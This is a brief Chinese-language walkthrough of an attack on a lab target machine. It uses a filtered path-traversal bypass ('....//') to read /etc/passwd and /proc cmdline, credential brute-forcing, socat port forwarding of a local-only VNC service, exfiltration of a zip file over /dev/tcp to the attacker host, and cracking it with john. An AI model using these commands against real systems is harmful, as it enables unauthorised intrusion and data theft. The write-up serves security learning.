掃描發現有三個埠
basic驗證需要使用者名稱密碼登入
訪問80埠
\URLFinder 發現有個internal的php檔案
看看有無任意檔案讀取漏洞
發現沒有回顯 但是總感覺怪怪的 應該是有啥東西 因為他這裡的出現了pre 標籤也許他是過濾了../ 我們改成....//試試
真的讀取到了
透過讀取passwd發現有個admin使用者
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash
在爆破9999埠basic驗證無效之後 其實就不知道咋搞了
看wp學習到我們可以利用proc資料夾來讀取更多的資訊
可以看這篇文章proc
cat /proc/【pid】/cmdline 可以讀取到當前程序是在執行什麼
例如
就可以看到 pid為1的程序在執行 initsplash
我們利用這一點直接爆破
發現basic的密碼了
登入成功 但是沒發現啥東西
除此之外我們還發現了一個有趣的埠5901 這是vnc的埠
嘗試一下用同樣的密碼能否ssh登入
登入成功
ss -al 檢視所有socket監聽埠
發現了這個5901的埠 這個埠可以vnc登入 但是他繫結了本機也就是說他只允許本地地址訪問
我們需要將他的埠轉發出來讓內網的kali也就是我們的攻擊機能訪問得到 這就需要埠轉發的工具socat
先wget 一下socatx64.bin
然後
./socatx64.bin TCP-LISTEN:5900,fork TCP4:192.168.200.246:5901&
將埠5901轉發到埠5900
再來ss -la檢視一下我們看到5900前面是0.0.0.0也就是說其他主機也可以訪問了不再侷限於本機ip
那麼接下來我們要看看如何登入vnc了
vnc登入需要一個passwd的檔案
這裡挺陰險的他有個隱藏檔案...
cd ...就能看到passwd檔案了
是個zip
解壓需要密碼
將這個檔案傳給kali
用nc傳輸
kali:nc -lp 10888 > a.zip
靶機:cat internalkey.zip > /dev/tcp/192.168.200.101/10888
將zip轉化為hash以便爆破密碼zip2john a.zip> tmp
再用john爆破Miami john tmp --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt
但是發現爆破不出來
猜測還是之前那個basic的密碼
解壓成功
接下來直接用vncviwer就OK了
vncviewer 192.168.200.246:5900 -passwd passwd
但是我不知道除了啥問題總是說vncviewer: VNC server closed connection 反正總體思路就是這樣